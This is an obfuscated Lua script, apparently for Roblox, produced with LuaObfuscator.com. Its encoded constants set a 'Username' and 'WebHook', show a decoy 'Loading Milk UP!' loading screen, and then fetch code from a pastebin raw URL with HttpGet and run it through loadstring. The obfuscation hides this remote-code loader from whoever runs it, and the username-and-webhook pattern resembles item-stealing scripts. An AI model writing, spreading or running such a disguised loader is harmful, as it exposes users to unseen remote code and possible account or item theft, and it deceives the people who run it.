--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v81=0;local v82;while true do if (v81==1) then return v82;end if (v81==0) then v82=v5(v70,v19);v19=nil;v81=1;end end else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v71-(v71%((1497 -(282 + 595)) -(555 + 64))) ;else local v72=931 -(857 + 74) ;local v73;while true do if (v72==(568 -(367 + 201))) then v73=((2566 -(1523 + 114)) -(214 + 713))^(v32-(1 + 0 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * 256) + v35 ;end local function v23()local v37=1270 -(226 + 1044) ;local v38;local v39;local v40;local v41;while true do if (v37==((350 -(87 + 263)) -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + 0 ;v37=1 + 0 ;end if (v37==(958 -(892 + 65))) then return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end end end local function v24()local v42=180 -(67 + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if ((0 + 0)==v42) then v43=v23();v44=v23();v42=2 -1 ;end if (v42==(3 + 0)) then if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * 0 ;else v47=431 -(44 + 386) ;v45=952 -(802 + 150) ;end elseif (v47==(5511 -3464)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(997 -(915 + 82))))) or (v48 * NaN) ;end return v8(v48,v47-(2896 -1873) ) * (v45 + (v46/((2 + 0)^((321 -253) -(7 + 9))))) ;end if (v42==(2 + 0)) then v47=v20(v44,1208 -(1069 + 118) ,(241 -171) -39 );v48=((v20(v44,69 -37 )==(1 + 0)) and  -(1 -(1747 -(760 + 987)))) or (1 + (1913 -(1789 + 124))) ;v42=(1560 -(745 + 21)) -(368 + 423) ;end if (v42==(3 -2)) then v45=1 -0 ;v46=(v20(v44,1081 -(1020 + 60) ,(14 + 24) -((27 -17) + 8) ) * ((7 -(19 -14))^32)) + v43 ;v42=6 -4 ;end end end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(1056 -(87 + 968)) );v18=v18 + v49 ;v50=(24 -16) -6 ;end if (v50==(1 + 1 + (0 -0))) then v52={};for v83=2 -1 , #v51 do v52[v83]=v2(v1(v3(v51,v83,v83)));end v50=1416 -(447 + 966) ;end if (v50==(8 -5)) then return v6(v52);end if (v50==(1817 -((1717 -(9 + 5)) + (490 -(85 + 291))))) then v51=nil;if  not v49 then v49=v23();if (v49==(701 -(376 + 325))) then return "";end end v50=1 -0 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(10 -6)) then while true do if (v54~=(583 -(361 + 219))) then else v61=nil;while true do local v104=0;local v105;while true do if (v104~=0) then else v105=320 -(53 + 267) ;while true do if (v105~=0) then else local v112=0 + 0 ;local v113;while true do if (0~=v112) then else v113=413 -(15 + 398) ;while true do if (v113~=(983 -(18 + 964))) then else v105=1;break;end if ((0 -0)==v113) then local v171=0 + 0 ;while true do if (v171==0) then if (v55==(2 + 1)) then local v177=0;local v178;while true do if (v177==(850 -(20 + 830))) then v178=0;while true do if (v178~=0) then else local v189=0;local v190;while true do if (v189~=0) then else v190=0;while true do if (0~=v190) then else local v199=0 + 0 ;while true do if (v199==0) then for v206=127 -(116 + 10) ,v23() do v57[v206-(1 + 0) ]=v28();end return v59;end end end end break;end end end end break;end end end if (v55==(738 -(542 + 196))) then local v179=0 -0 ;local v180;while true do if (v179~=0) then else v180=0 + 0 ;while true do if (v180==1) then v58={};v55=1 + 0 ;break;end if ((0 + 0)==v180) then v56={};v57={};v180=2 -1 ;end end break;end end end v171=1;end if (v171~=1) then else v113=1;break;end end end end break;end end end if (1==v105) then if (v55==(4 -2)) then local v138=1551 -(1126 + 425) ;local v139;local v140;while true do if (v138~=(405 -(118 + 287))) then else v139=0;v140=nil;v138=3 -2 ;end if (v138~=1) then else while true do if (v139==(1121 -(118 + 1003))) then v140=0;while true do if (v140==0) then local v181=0;local v182;while true do if (v181~=(0 -0)) then else v182=377 -(142 + 235) ;while true do if (v182==1) then v140=4 -3 ;break;end if (v182==(0 + 0)) then local v191=0;while true do if (v191==1) then v182=978 -(553 + 424) ;break;end if (v191~=(0 -0)) then else for v194=1 + 0 ,v60 do local v195=0;local v196;local v197;local v198;while true do if (v195~=(1 + 0)) then else v198=nil;while true do if (v196==(1 + 0)) then if (v197==(1 + 0)) then v198=v21()~=0 ;elseif (v197==2) then v198=v24();elseif (v197==(2 + 1)) then v198=v25();end v61[v194]=v198;break;end if (0~=v196) then else local v209=0;while true do if (v209~=0) then else v197=v21();v198=nil;v209=2 -1 ;end if (v209==1) then v196=1;break;end end end end break;end if (v195~=(0 -0)) then else v196=0 -0 ;v197=nil;v195=1 + 0 ;end end end v59[3]=v21();v191=1;end end end end break;end end end if ((4 -3)~=v140) then else for v183=1,v23() do local v184=0;local v185;local v186;local v187;while true do if (v184==(754 -(239 + 514))) then v187=nil;while true do if (1~=v185) then else while true do if (v186~=0) then else v187=v21();if (v20(v187,1 + 0 ,1)~=(1329 -(797 + 532))) then else local v200=0;local v201;local v202;local v203;local v204;while true do if (v200==(1 + 0)) then v203=nil;v204=nil;v200=2;end if (v200~=(0 + 0)) then else local v205=0;while true do if (v205==0) then v201=0;v202=nil;v205=1;end if (v205==(2 -1)) then v200=1203 -(373 + 829) ;break;end end end if (v200==2) then while true do if (v201==2) then if (v20(v203,732 -(476 + 255) ,1)~=1) then else v204[1132 -(369 + 761) ]=v61[v204[2]];end if (v20(v203,2,2)==1) then v204[3]=v61[v204[3]];end v201=2 + 1 ;end if (v201==1) then local v210=0 -0 ;local v211;while true do if (v210==(0 -0)) then v211=238 -(64 + 174) ;while true do if (v211~=1) then else v201=1 + 1 ;break;end if (v211==(0 -0)) then local v220=336 -(144 + 192) ;while true do if (v220~=(216 -(42 + 174))) then else v204={v22(),v22(),nil,nil};if (v202==0) then local v221=0 + 0 ;local v222;local v223;while true do if (v221==(0 + 0)) then v222=0;v223=nil;v221=1;end if (v221==(1505 -(363 + 1141))) then while true do if ((1580 -(1183 + 397))==v222) then v223=0;while true do if (v223==(0 -0)) then v204[3 + 0 ]=v22();v204[3 + 1 ]=v22();break;end end break;end end break;end end elseif (v202==(1976 -(1913 + 62))) then v204[2 + 1 ]=v23();elseif (v202==2) then v204[3]=v23() -((5 -3)^(1949 -(565 + 1368))) ;elseif (v202==3) then local v226=0;local v227;local v228;while true do if (v226==1) then while true do if (0==v227) then v228=0;while true do if (v228~=0) then else v204[11 -8 ]=v23() -(2^16) ;v204[4]=v22();break;end end break;end end break;end if (0==v226) then v227=1661 -(1477 + 184) ;v228=nil;v226=1 -0 ;end end end v220=1 + 0 ;end if (v220==(857 -(564 + 292))) then v211=1 -0 ;break;end end end end break;end end end if (v201==0) then local v212=0 -0 ;while true do if (1==v212) then v201=1;break;end if ((304 -(244 + 60))~=v212) then else v202=v20(v187,2 + 0 ,479 -(41 + 435) );v203=v20(v187,1005 -(938 + 63) ,6);v212=1 + 0 ;end end end if (3==v201) then if (v20(v203,1128 -(936 + 189) ,1 + 2 )~=(1614 -(1565 + 48))) then else v204[3 + 1 ]=v61[v204[1142 -(782 + 356) ]];end v56[v183]=v204;break;end end break;end end end break;end end break;end if (v185==(267 -(176 + 91))) then local v192=0;while true do if (v192==0) then v186=0;v187=nil;v192=2 -1 ;end if (v192==1) then v185=1 -0 ;break;end end end end break;end if (v184==(1092 -(975 + 117))) then local v188=1875 -(157 + 1718) ;while true do if (v188==1) then v184=1;break;end if (v188==(0 + 0)) then v185=0;v186=nil;v188=3 -2 ;end end end end end v55=3;break;end end break;end end break;end end end if (v55~=1) then else local v141=0 -0 ;local v142;while true do if (v141~=(1018 -(697 + 321))) then else v142=0;while true do if (v142~=0) then else local v174=0;while true do if (v174==(2 -1)) then v142=1 -0 ;break;end if (v174==(0 -0)) then v59={v56,v57,nil,v58};v60=v23();v174=2 -1 ;end end end if (v142==1) then v61={};v55=1229 -(322 + 905) ;break;end end break;end end end break;end end break;end end end break;end if (v54==2) then local v102=0;while true do if (v102~=(611 -(602 + 9))) then else local v110=0;while true do if (v110~=1) then else v102=1190 -(449 + 740) ;break;end if (v110~=(872 -(826 + 46))) then else v59=nil;v60=nil;v110=1;end end end if (1==v102) then v54=3;break;end end end if (v54==(948 -(245 + 702))) then v57=nil;v58=nil;v54=6 -4 ;end if (v54~=0) then else local v103=0 + 0 ;while true do if (v103~=1) then else v54=1899 -(260 + 1638) ;break;end if ((440 -(382 + 58))~=v103) then else local v111=0 -0 ;while true do if (v111==0) then v55=0 + 0 ;v56=nil;v111=1 -0 ;end if ((2 -1)==v111) then v103=1206 -(902 + 303) ;break;end end end end end end break;end if (v53==0) then local v74=0;while true do if (v74~=(1 -0)) then else v53=2 -1 ;break;end if ((0 + 0)==v74) then v54=0;v55=nil;v74=1691 -(1121 + 569) ;end end end if (v53==(216 -(22 + 192))) then local v75=0;while true do if (v75==0) then v58=nil;v59=nil;v75=1;end if (v75==(684 -(483 + 200))) then v53=1466 -(1404 + 59) ;break;end end end if (v53==1) then local v76=0 -0 ;while true do if (v76~=(1 -0)) then else v53=767 -(468 + 297) ;break;end if (v76~=0) then else v56=nil;v57=nil;v76=563 -(334 + 228) ;end end end if (v53~=(10 -7)) then else local v77=0 -0 ;while true do if (v77~=0) then else v60=nil;v61=nil;v77=1 -0 ;end if (v77==1) then v53=2 + 2 ;break;end end end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v85=v66;local v86=v67;local v87=v68;local v88=v27;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v99=0,v93 do if (v99>=v87) then v91[v99-v87 ]=v92[v99 + 1 ];else v95[v99]=v92[v99 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do v97=v85[v89];v98=v97[1];if (v98<=9) then if (v98<=4) then if (v98<=1) then if (v98>0) then local v114=v97[2];v95[v114]=v95[v114](v13(v95,v114 + 1 ,v90));else v95[v97[2]]=v97[3];end elseif (v98<=2) then do return;end elseif (v98>3) then v95[v97[2]]=v97[3];else local v145=0;local v146;local v147;while true do if (v145==1) then v95[v146 + 1 ]=v147;v95[v146]=v147[v97[4]];break;end if (v145==0) then v146=v97[2];v147=v95[v97[3]];v145=1;end end end elseif (v98<=6) then if (v98>5) then local v118=v97[2];local v119=v95[v97[3]];v95[v118 + 1 ]=v119;v95[v118]=v119[v97[4]];else v95[v97[2]]=v97[3]~=0 ;end elseif (v98<=7) then v95[v97[2]]=v64[v97[3]];elseif (v98>8) then v95[v97[2]]();else local v148=0;local v149;while true do if (v148==0) then v149=v97[2];v95[v149]=v95[v149](v13(v95,v149 + 1 ,v90));break;end end end elseif (v98<=14) then if (v98<=11) then if (v98>10) then local v126=0;local v127;local v128;local v129;local v130;while true do if (2==v126) then for v160=v127,v90 do v130=v130 + 1 ;v95[v160]=v128[v130];end break;end if (v126==0) then v127=v97[2];v128,v129=v88(v95[v127](v13(v95,v127 + 1 ,v97[3])));v126=1;end if (1==v126) then v90=(v129 + v127) -1 ;v130=0;v126=2;end end else v95[v97[2]]=v97[3]~=0 ;end elseif (v98<=12) then v95[v97[2]][v97[3]]=v97[4];elseif (v98>13) then v64[v97[3]]=v95[v97[2]];else v95[v97[2]][v97[3]]=v97[4];end elseif (v98<=16) then if (v98>15) then v95[v97[2]]=v64[v97[3]];else v64[v97[3]]=v95[v97[2]];end elseif (v98<=17) then do return;end elseif (v98>18) then v95[v97[2]]();else local v154=0;local v155;local v156;local v157;local v158;while true do if (0==v154) then v155=v97[2];v156,v157=v88(v95[v155](v13(v95,v155 + 1 ,v97[3])));v154=1;end if (v154==1) then v90=(v157 + v155) -1 ;v158=0;v154=2;end if (v154==2) then for v172=v155,v90 do local v173=0;while true do if (0==v173) then v158=v158 + 1 ;v95[v172]=v156[v158];break;end end end break;end end end v89=v89 + 1 ;end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!143O0003083O00557365726E616D65030A3O0070722O6573746F6E5F3703073O00576562482O6F6B030B3O00576562482O6F6B48657265030D3O006C6F6164696E677363722O656E03023O005F4703103O00437573746F6D5363726970744E616D6503103O004C6F6164696E67204D696C6B2055502103053O00546578743103103O00536372697074204C6F616465643O2E03053O00546578743203123O0057616974696E6720666F722053637269707403053O00546578743303133O00436865636B696E6720536372697074733O2E03053O00546578743403133O005374617274696E6720536372697074733O2E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F7579555750475A3600183O0012043O00023O00120E3O00013O0012043O00043O00120E3O00034O000A3O00013O00120E3O00053O0012073O00063O00300D3O000700080012073O00063O00300D3O0009000A0012073O00063O00300D3O000B000C0012073O00063O00300D3O000D000E0012073O00063O00300D3O000F00100012073O00113O001207000100123O002003000100010013001204000300144O000B000100034O00015O00022O00133O000100012O00023O00017O00",v9(),...);end
